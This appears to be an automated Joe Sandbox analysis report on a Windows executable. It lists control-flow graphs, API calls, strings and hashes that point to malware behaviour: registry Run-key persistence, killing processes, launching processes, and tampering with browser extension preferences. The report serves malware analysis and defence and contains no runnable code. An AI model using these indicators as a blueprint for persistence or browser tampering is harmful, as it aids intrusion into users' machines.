                                                                                                                                                                  control_flow_graph 5851 7ff72c9c3a10-7ff72c9c3a62 RegOpenKeyExA 5852 7ff72c9c3b02-7ff72c9c3b0c 5851->5852 5853 7ff72c9c3a68-7ff72c9c3a8e 5851->5853 5854 7ff72c9c3b11-7ff72c9c3b19 5852->5854 5855 7ff72c9c3b0e 5852->5855 5856 7ff72c9c3a90-7ff72c9c3a97 5853->5856 5858 7ff72c9c3b1e-7ff72c9c3b4b RegSetValueExA RegCloseKey 5854->5858 5859 7ff72c9c3b1b 5854->5859 5855->5854 5856->5856 5857 7ff72c9c3a99-7ff72c9c3aac call 7ff72c9d44a0 5856->5857 5871 7ff72c9c3ae0-7ff72c9c3b01 call 7ff72c9f2770 5857->5871 5872 7ff72c9c3aae-7ff72c9c3ac0 5857->5872 5861 7ff72c9c3b51-7ff72c9c3b66 5858->5861 5862 7ff72c9c3c50-7ff72c9c3c6c 5858->5862 5859->5858 5863 7ff72c9c3cd9-7ff72c9c3cdf call 7ff72c9b2410 5861->5863 5864 7ff72c9c3b6c-7ff72c9c3b71 5861->5864 5865 7ff72c9c3c73-7ff72c9c3c7a 5862->5865 5867 7ff72c9c3b76-7ff72c9c3bd6 call 7ff72c9d60e0 call 7ff72c9d08c0 5864->5867 5868 7ff72c9c3b73 5864->5868 5865->5865 5870 7ff72c9c3c7c-7ff72c9c3c8f call 7ff72c9d44a0 5865->5870 5890 7ff72c9c3bd8-7ff72c9c3bea 5867->5890 5891 7ff72c9c3c0b-7ff72c9c3c14 5867->5891 5868->5867 5870->5871 5885 7ff72c9c3c95-7ff72c9c3ca7 5870->5885 5876 7ff72c9c3ac2-7ff72c9c3ad5 5872->5876 5877 7ff72c9c3adb call 7ff72c9f2790 5872->5877 5876->5877 5881 7ff72c9c3cd3-7ff72c9c3cd8 call 7ff72c9fcd30 5876->5881 5877->5871 5881->5863 5885->5877 5889 7ff72c9c3cad-7ff72c9c3cc0 5885->5889 5889->5881 5892 7ff72c9c3cc2 5889->5892 5893 7ff72c9c3c05-7ff72c9c3c0a call 7ff72c9f2790 5890->5893 5894 7ff72c9c3bec-7ff72c9c3bff 5890->5894 5891->5871 5895 7ff72c9c3c1a-7ff72c9c3c2c 5891->5895 5892->5877 5893->5891 5894->5893 5896 7ff72c9c3cc7-7ff72c9c3ccc call 7ff72c9fcd30 5894->5896 5895->5877 5898 7ff72c9c3c32-7ff72c9c3c45 5895->5898 5901 7ff72c9c3ccd-7ff72c9c3cd2 call 7ff72c9fcd30 5896->5901 5898->5901 5902 7ff72c9c3c4b 5898->5902 5901->5881 5902->5877
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
                                                                                                                                                                  • String ID: ' to startup.$*L\(&.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
                                                                                                                                                                  • API String ID: 31251203-1506508757
                                                                                                                                                                  • Opcode ID: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                  • Instruction ID: 77b0dd3b80e150520b8df861d7142856cebaf773a9a325edaf18d109cca2b97c
                                                                                                                                                                  • Opcode Fuzzy Hash: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                  • Instruction Fuzzy Hash: DC719572A18B4141EA10AB25E84436DA361FBA97F0F904331EABD13AD9DF3CE590CF54

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5906 7ff72c9ee7c8-7ff72c9ee811 call 7ff72c9ee770 5909 7ff72c9ee813 5906->5909 5910 7ff72c9ee84e-7ff72c9ee851 5906->5910 5911 7ff72c9ee816-7ff72c9ee83a SetFileInformationByHandle 5909->5911 5912 7ff72c9ee9bb-7ff72c9ee9c2 5910->5912 5913 7ff72c9ee857-7ff72c9ee871 call 7ff72c9ee770 5910->5913 5914 7ff72c9ee83c-7ff72c9ee840 5911->5914 5915 7ff72c9ee8b8-7ff72c9ee8c3 GetLastError 5911->5915 5917 7ff72c9ee9d3 5912->5917 5918 7ff72c9ee9c4-7ff72c9ee9c7 5912->5918 5913->5911 5928 7ff72c9ee873-7ff72c9ee882 5913->5928 5919 7ff72c9ee843-7ff72c9ee847 5914->5919 5923 7ff72c9ee8c5-7ff72c9ee8c8 5915->5923 5924 7ff72c9ee8db-7ff72c9ee8e5 call 7ff72c9ee03c 5915->5924 5922 7ff72c9ee9d5 5917->5922 5918->5917 5921 7ff72c9ee9c9-7ff72c9ee9cc 5918->5921 5925 7ff72c9ee892-7ff72c9ee8b7 call 7ff72c9f2770 5919->5925 5926 7ff72c9ee849-7ff72c9ee84c 5919->5926 5921->5917 5929 7ff72c9ee9ce-7ff72c9ee9d1 5921->5929 5935 7ff72c9ee9dd-7ff72c9ee9e2 call 7ff72ca01774 5922->5935 5923->5924 5930 7ff72c9ee8ca-7ff72c9ee8cd 5923->5930 5924->5914 5938 7ff72c9ee8eb-7ff72c9ee8ee 5924->5938 5932 7ff72c9ee884-7ff72c9ee88c CloseHandle 5926->5932 5928->5925 5928->5932 5929->5917 5929->5922 5930->5924 5931 7ff72c9ee8cf 5930->5931 5937 7ff72c9ee8d3-7ff72c9ee8d6 5931->5937 5932->5925 5932->5935 5942 7ff72c9ee9e3-7ff72c9ee9eb call 7ff72ca01774 5935->5942 5937->5919 5938->5931 5941 7ff72c9ee8f0-7ff72c9ee8f3 5938->5941 5941->5931 5943 7ff72c9ee8f5-7ff72c9ee90c GetFileInformationByHandleEx 5941->5943 5945 7ff72c9ee90e 5943->5945 5946 7ff72c9ee93b-7ff72c9ee940 5943->5946 5948 7ff72c9ee912-7ff72c9ee918 GetLastError 5945->5948 5949 7ff72c9ee9b5-7ff72c9ee9b9 5946->5949 5950 7ff72c9ee942-7ff72c9ee95c SetFileInformationByHandle 5946->5950 5952 7ff72c9ee91b-7ff72c9ee91f 5948->5952 5951 7ff72c9ee99a-7ff72c9ee9a1 5949->5951 5950->5945 5953 
7ff72c9ee95e-7ff72c9ee968 call 7ff72c9ee03c 5950->5953 5951->5952 5952->5925 5955 7ff72c9ee925-7ff72c9ee930 CloseHandle 5952->5955 5958 7ff72c9ee973-7ff72c9ee976 5953->5958 5959 7ff72c9ee96a-7ff72c9ee971 5953->5959 5955->5942 5957 7ff72c9ee936 5955->5957 5957->5925 5960 7ff72c9ee9a6-7ff72c9ee9b0 GetLastError 5958->5960 5961 7ff72c9ee978-7ff72c9ee994 SetFileInformationByHandle 5958->5961 5959->5952 5960->5937 5961->5948 5961->5951
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2221425841-578493202
                                                                                                                                                                  • Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                  • Instruction ID: ea6ff57164188f3ca2e147095470d080db346ebd3b99c2c42711e177cbbb30a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                  • Instruction Fuzzy Hash: D151B431F0C6C289F764AB715C006BDBBA4EB357B4F840236CD9E56AD8DE28E4018B61
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
                                                                                                                                                                  • API String ID: 2697701713-219585183
                                                                                                                                                                  • Opcode ID: e7e34766d18897c14f6b3ed873318c8129d138f170e2966466770a0b5afc195d
                                                                                                                                                                  • Instruction ID: 9f878d9cfaa74cd645d719e59d6a37671e9a37b7f619401f8200e183e2cd654f
                                                                                                                                                                  • Opcode Fuzzy Hash: e7e34766d18897c14f6b3ed873318c8129d138f170e2966466770a0b5afc195d
                                                                                                                                                                  • Instruction Fuzzy Hash: F4328F62A1CBC291EA31EB14E8903EEA365FBA4764F804132D6CD57A99EF7CD544CF10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
                                                                                                                                                                  • String ID: *L\(&.$Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
                                                                                                                                                                  • API String ID: 3307072288-2419563426
                                                                                                                                                                  • Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                  • Instruction ID: 5b2dbcb1ff861104c070a681ba026408e21b6d3d5aef11918f268d3f8cbf0322
                                                                                                                                                                  • Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                  • Instruction Fuzzy Hash: 29516271A0C68281EA20AB11FC416FAE371FFA97E4F804131DA9D53699EE7CE245CF50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
                                                                                                                                                                  • API String ID: 1686256323-547103015
                                                                                                                                                                  • Opcode ID: dc43d232e4247356cf47546e23c2d7af4d26eafae193d06c5c4db65f53e63fe9
                                                                                                                                                                  • Instruction ID: faeb2369b1c601e5bbe4a795447626dbf2c28ea2e748c15c691e805a714e9171
                                                                                                                                                                  • Opcode Fuzzy Hash: dc43d232e4247356cf47546e23c2d7af4d26eafae193d06c5c4db65f53e63fe9
                                                                                                                                                                  • Instruction Fuzzy Hash: 18E1C762A58B8591DA60EB25E94037EF361FBA5BB0F948231DADD03795DF3CE481CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
                                                                                                                                                                  • String ID: *L\(&.$Failed to start process. Error: $Process started successfully.
                                                                                                                                                                  • API String ID: 1451358647-4289709590
                                                                                                                                                                  • Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                  • Instruction ID: b2b2ed1c5fad083d295e3f3fb989fda28cf27c2013e850e9cc6bf12ce5d74984
                                                                                                                                                                  • Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51AA72E18B4582EA10EB65E84036DA761EBE57B4F904335EAEC12AD9DF7CD1C0CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: d555225036e99206b5252b2ebf367420b7452d8b36f1f8833aa849c4bd55e744
                                                                                                                                                                  • Instruction ID: 3cca60e42d4a93eb02bd6d1140d9ddc6a4e2b6dfab176c5f3de97afd69b25fc0
                                                                                                                                                                  • Opcode Fuzzy Hash: d555225036e99206b5252b2ebf367420b7452d8b36f1f8833aa849c4bd55e744
                                                                                                                                                                  • Instruction Fuzzy Hash: 09C1E62290D68742F760AB25BD40BBDEB71EBA0BE0F950131DA4D07391EE7CE854CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$directory_iterator::directory_iterator$status
                                                                                                                                                                  • API String ID: 250480979-252251142
                                                                                                                                                                  • Opcode ID: 6b271a603e1a1da7f7bcda79ef5f09e12fa8ad839d1168a2ce8e3c19f117126c
                                                                                                                                                                  • Instruction ID: 9e2e7302ece7bc98575499bc76e97f98d32a175d486301f2607b816c545df039
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b271a603e1a1da7f7bcda79ef5f09e12fa8ad839d1168a2ce8e3c19f117126c
                                                                                                                                                                  • Instruction Fuzzy Hash: 57A1A372F04B8186EB00EF75C8402ACB361FB69BA8F548631DA8D57B95DF38D691CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2067211477-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3215553584-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 56456669-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF72CA08023), ref: 00007FF72CA08154
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF72CA08023), ref: 00007FF72CA081DF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 73155330-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: ios_base::badbit set
                                                                                                                                                                  • API String ID: 73155330-3882152299
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA070FC: GetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0710B
                                                                                                                                                                    • Part of subcall function 00007FF72CA070FC: SetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA071AB
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72C9F9295,?,?,?,?,00007FF72C9F90D9), ref: 00007FF72C9F9123
                                                                                                                                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF72C9F9295,?,?,?,?,00007FF72C9F90D9), ref: 00007FF72C9F9139
                                                                                                                                                                  • ExitThread.KERNEL32 ref: 00007FF72C9F9142
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1991824761-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9CF4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9CF5E2
                                                                                                                                                                    • Part of subcall function 00007FF72C9CF4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9CF5E8
                                                                                                                                                                    • Part of subcall function 00007FF72C9F91B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C9F91DB
                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00007FF72C9D8957
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 88918588-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF72CA0BFAC,?,?,?,?,00000000,00007FF72CA0C0B5), ref: 00007FF72CA0C00C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00007FF72CA0BFAC,?,?,?,?,00000000,00007FF72CA0C0B5), ref: 00007FF72CA0C016
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF72CA0388A,?,?,?,00007FF72CA03C62,?,?,?,?,00007FF72CA167E8,?,?,?), ref: 00007FF72CA11A14
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF72CA0388A,?,?,?,00007FF72CA03C62,?,?,?,?,00007FF72CA167E8,?,?,?), ref: 00007FF72CA11A7E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1611280651-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  APIs
